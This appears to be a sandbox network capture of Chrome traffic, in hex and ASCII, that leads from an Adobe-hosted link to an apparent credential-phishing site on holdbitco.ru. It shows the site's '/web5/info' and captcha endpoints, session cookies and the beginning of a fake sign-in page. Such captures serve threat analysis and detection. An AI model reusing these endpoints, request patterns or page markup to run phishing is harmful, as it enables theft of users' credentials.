                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                              cf-chl-out: /GcquQyV8niCebDccSn+sQ==$mUupujJYXByCd7M2vtGwvw==
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd588df471757-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1554INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1554INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              118192.168.2.1649836172.253.122.102443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:46 UTC1554OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000079CA5C85A9 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: clients1.google.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              119172.253.122.102443192.168.2.1649836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:46 UTC1554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-XeRgUDmalX-D2N5Svv6t4g' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ySsn30U0HPgR7O1_IXlN0A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:28:46 GMT
                                                                                                                                                                                                                                                                                                              Expires: Wed, 25 Oct 2023 16:28:46 GMT
                                                                                                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Server: GSE
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:46 UTC1555INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 38 31 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 38 31 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 38 31 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 38 31 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 38 31 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 38 31 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 62 63 36 32 32 61 64 37 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: rlzC1: 1C1ONGR_enUS1081rlzC2: 1C2ONGR_enUS1081rlzC7: 1C7ONGR_enUS1081dcc: set_dcc: C1:1C1ONGR_enUS1081,C2:1C2ONGR_enUS1081,C7:1C7ONGR_enUS1081events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: bc622ad7


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              12192.168.2.1649747157.240.229.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC217OUTGET /en_US/sdk.js?hash=3740de9a4f4c75e0f8a8b2570a1a8fbc HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://indd.adobe.com
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              120104.21.0.95443192.168.2.1649834C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1555INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:15 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Powered-By: PHP/8.1.10
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x047%2FHTHBQ8A8PiuZVjJU4UUZapA3Uje1UeSZZXFOM9MdLr2JOHk4J3n4%2BDWc8%2Fhfl3hytgMnda1h7sCQjw3NdWWEHogl%2F9fmdkUU36o%2FgFz%2BJvRSsI2SJh%2FQVAC5fji0EpMwnELOgmlOLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlJWMG9PN3pKUW9BNDhXZXVKMzRzWnc9PSIsInZhbHVlIjoiS1R0R1JLYkhCV3k5aW5kS2U4ckVNZkcvTmhWRVpmamxNZGZyU3liVkowTVM1aDh1UVBEUWU0QUYyMi9sWTJhVE1pY1p4dS9HUU1admNKb3dmVUNjZ0k0R0o3L1VKSSt4VmFMSXIvWFJTUGlQVkdUNitRaWU0YmFVdzF4Z20wb3EiLCJtYWMiOiI3M2EyZGY3MDU4ZDE1NzYzMDFjM2M3NTg2ZjRhZWFlMWFhY2EzZjEyODkxNzRiOGU3NGMzZmVjY2JlNDMxZDZjIiwidGFnIjoiIn0%3D; expires=Wed, 25-Oct-2023 18:29:15 GMT; Max-Age=7200; path=/; samesite=lax
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1556INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 63 32 4d 43 39 61 4e 45 5a 68 64 30 6c 42 54 6e 4e 71 62 32 39 57 63 44 42 44 55 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 6e 64 71 4d 6c 6f 72 61 45 52 57 57 47 74 33 52 44 45 7a 61 6b 39 6b 52 47 51 77 61 6b 74 56 4c 33 6c 42 53 32 34 7a 56 30 34 33 54 55 78 52 63 6c 59 79 4d 6b 52 59 59 6d 52 4d 4d 32 52 49 65 45 46 6e 63 56 56 54 64 33 64 32 55 6b 6c 50 51 56 70 4b 54 31 4a 73 53 6b 74 4f 64 7a 64 50 61 45 4d 31 62 79 74 55 64 47 46 73 59 6e 6c 49 54 31 45 78 56 6e 42 36 61 6c 6c 79 54 32 35 6b 57 44 52 49 57 44 4a 57 61 32 70 72 55 44 46 58 65 58 67 30 5a 55 4e 6f 57 54 64 6d 53 30 30 31 51 32 4a 75 51 57 31 72 5a 56 41
                                                                                                                                                                                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ilc2MC9aNEZhd0lBTnNqb29WcDBDUEE9PSIsInZhbHVlIjoiYndqMloraERWWGt3RDEzak9kRGQwaktVL3lBS24zV043TUxRclYyMkRYYmRMM2RIeEFncVVTd3d2UklPQVpKT1JsSktOdzdPaEM1bytUdGFsYnlIT1ExVnB6allyT25kWDRIWDJWa2prUDFXeXg0ZUNoWTdmS001Q2JuQW1rZVA
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1557INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 14{"status":"success"}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1557INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              121192.168.2.1649837104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1557OUTPOST /web5/info HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 22
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6IlJWMG9PN3pKUW9BNDhXZXVKMzRzWnc9PSIsInZhbHVlIjoiS1R0R1JLYkhCV3k5aW5kS2U4ckVNZkcvTmhWRVpmamxNZGZyU3liVkowTVM1aDh1UVBEUWU0QUYyMi9sWTJhVE1pY1p4dS9HUU1admNKb3dmVUNjZ0k0R0o3L1VKSSt4VmFMSXIvWFJTUGlQVkdUNitRaWU0YmFVdzF4Z20wb3EiLCJtYWMiOiI3M2EyZGY3MDU4ZDE1NzYzMDFjM2M3NTg2ZjRhZWFlMWFhY2EzZjEyODkxNzRiOGU3NGMzZmVjY2JlNDMxZDZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilc2MC9aNEZhd0lBTnNqb29WcDBDUEE9PSIsInZhbHVlIjoiYndqMloraERWWGt3RDEzak9kRGQwaktVL3lBS24zV043TUxRclYyMkRYYmRMM2RIeEFncVVTd3d2UklPQVpKT1JsSktOdzdPaEM1bytUdGFsYnlIT1ExVnB6allyT25kWDRIWDJWa2prUDFXeXg0ZUNoWTdmS001Q2JuQW1rZVAiLCJtYWMiOiIzODQxYTRkZWE0MzVlY2FlOGZjNWYzNDc2Zjg1MTgyYzRmNzM1ZjE4MWRmNzFiMGYyMzk0MzMxNzAwMTI1ZjEyIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1558OUTData Raw: 74 79 70 65 3d 34 26 70 61 67 65 6c 69 6e 6b 3d 31 72 64 35 35 31
                                                                                                                                                                                                                                                                                                              Data Ascii: type=4&pagelink=1rd551


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              122192.168.2.1649838104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1558OUTPOST /web5/info HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 23
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6IlJWMG9PN3pKUW9BNDhXZXVKMzRzWnc9PSIsInZhbHVlIjoiS1R0R1JLYkhCV3k5aW5kS2U4ckVNZkcvTmhWRVpmamxNZGZyU3liVkowTVM1aDh1UVBEUWU0QUYyMi9sWTJhVE1pY1p4dS9HUU1admNKb3dmVUNjZ0k0R0o3L1VKSSt4VmFMSXIvWFJTUGlQVkdUNitRaWU0YmFVdzF4Z20wb3EiLCJtYWMiOiI3M2EyZGY3MDU4ZDE1NzYzMDFjM2M3NTg2ZjRhZWFlMWFhY2EzZjEyODkxNzRiOGU3NGMzZmVjY2JlNDMxZDZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilc2MC9aNEZhd0lBTnNqb29WcDBDUEE9PSIsInZhbHVlIjoiYndqMloraERWWGt3RDEzak9kRGQwaktVL3lBS24zV043TUxRclYyMkRYYmRMM2RIeEFncVVTd3d2UklPQVpKT1JsSktOdzdPaEM1bytUdGFsYnlIT1ExVnB6allyT25kWDRIWDJWa2prUDFXeXg0ZUNoWTdmS001Q2JuQW1rZVAiLCJtYWMiOiIzODQxYTRkZWE0MzVlY2FlOGZjNWYzNDc2Zjg1MTgyYzRmNzM1ZjE4MWRmNzFiMGYyMzk0MzMxNzAwMTI1ZjEyIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1560OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 31 72 64 35 35 31 26 74 79 70 65 3d 31 30
                                                                                                                                                                                                                                                                                                              Data Ascii: pagelink=1rd551&type=10


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              123192.168.2.1649839104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1560OUTGET /web5/validatecaptcha HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6IlJWMG9PN3pKUW9BNDhXZXVKMzRzWnc9PSIsInZhbHVlIjoiS1R0R1JLYkhCV3k5aW5kS2U4ckVNZkcvTmhWRVpmamxNZGZyU3liVkowTVM1aDh1UVBEUWU0QUYyMi9sWTJhVE1pY1p4dS9HUU1admNKb3dmVUNjZ0k0R0o3L1VKSSt4VmFMSXIvWFJTUGlQVkdUNitRaWU0YmFVdzF4Z20wb3EiLCJtYWMiOiI3M2EyZGY3MDU4ZDE1NzYzMDFjM2M3NTg2ZjRhZWFlMWFhY2EzZjEyODkxNzRiOGU3NGMzZmVjY2JlNDMxZDZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilc2MC9aNEZhd0lBTnNqb29WcDBDUEE9PSIsInZhbHVlIjoiYndqMloraERWWGt3RDEzak9kRGQwaktVL3lBS24zV043TUxRclYyMkRYYmRMM2RIeEFncVVTd3d2UklPQVpKT1JsSktOdzdPaEM1bytUdGFsYnlIT1ExVnB6allyT25kWDRIWDJWa2prUDFXeXg0ZUNoWTdmS001Q2JuQW1rZVAiLCJtYWMiOiIzODQxYTRkZWE0MzVlY2FlOGZjNWYzNDc2Zjg1MTgyYzRmNzM1ZjE4MWRmNzFiMGYyMzk0MzMxNzAwMTI1ZjEyIiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              124104.21.0.95443192.168.2.1649838C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Powered-By: PHP/8.1.10
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8PxhNaNGMYML8%2F2t%2BuYySKsGS1NKCLOmDW%2FRC%2BmsbJEcNaGEC%2BbO%2Bvj1yDMKBziCPvrdDY903mjEG1PsX5CkVr%2BLRFExRxFfkr%2FTljixPm4jIlzxvHrBVT01qHfwWwq%2BiO%2FcZ7F8Jfag3LA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; expires=Wed, 25-Oct-2023 18:29:16 GMT; Max-Age=7200; path=/; samesite=lax
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1562INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 6c 48 4e 6e 6c 4c 55 33 4e 35 56 56 52 68 65 6d 31 6f 5a 33 4e 52 54 33 59 72 62 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 6c 46 5a 57 6e 4d 33 52 47 52 71 4d 6d 6f 30 5a 6d 4a 79 4e 46 4a 6a 55 6e 49 79 4e 54 67 76 65 54 4a 6e 55 6b 6f 7a 51 56 56 46 54 6d 35 56 54 6c 56 35 4c 31 4e 61 63 6a 68 69 56 44 52 49 51 32 67 7a 52 6d 63 34 51 55 56 4e 62 55 51 31 65 55 78 6c 54 33 70 72 51 6e 4e 75 53 48 4e 76 64 56 4e 4d 4e 33 68 42 4d 56 42 5a 52 44 6c 57 61 6b 6c 5a 65 45 74 42 51 79 39 75 4b 32 31 44 54 7a 42 57 54 54 56 6f 55 48 46 46 4e 6c 56 6c 59 6c 4a 75 4f 57 35 49 4c 30 68 4b 57 6c 68 53 64 6a 68 30 55 33 4e 42 64 31 51
                                                                                                                                                                                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1Q
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1563INData Raw: 37 66 66 61 0d 0a 3c 64 69 76 20 69 64 3d 22 73 65 63 74 69 6f 6e 73 22 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 65 63 74 69 6f 6e 5f 74 72 79 69 6e 67 74 6f 73 69 67 6e 69 6e 22 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 75 74 68 2d 77 72 61 70 70 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 7ffa<div id="sections" class="d-none"> <section id="section_tryingtosignin" class="d-none"> <div class="auth-wrapper"> <div class="loading-container"> <div class="dot-floating"></div> <div cla
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1564INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 72 73 74 6c 6f 67 6f 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 6f 6e 63 6c 69 63 6b 3d 22 62 61 63 6b 62 74 6e 28 29 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 77 65 62 35 2f 61 73 73 65 74 73 2f 62 61 63 6b 2e 70 6e 67 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <div class="sectioncontent"> <div class="firstlogo"></div> <button class="back" onclick="backbtn()" style="display: none"> <img src="/web5/assets/back.png"/> </button> <h2 class="title
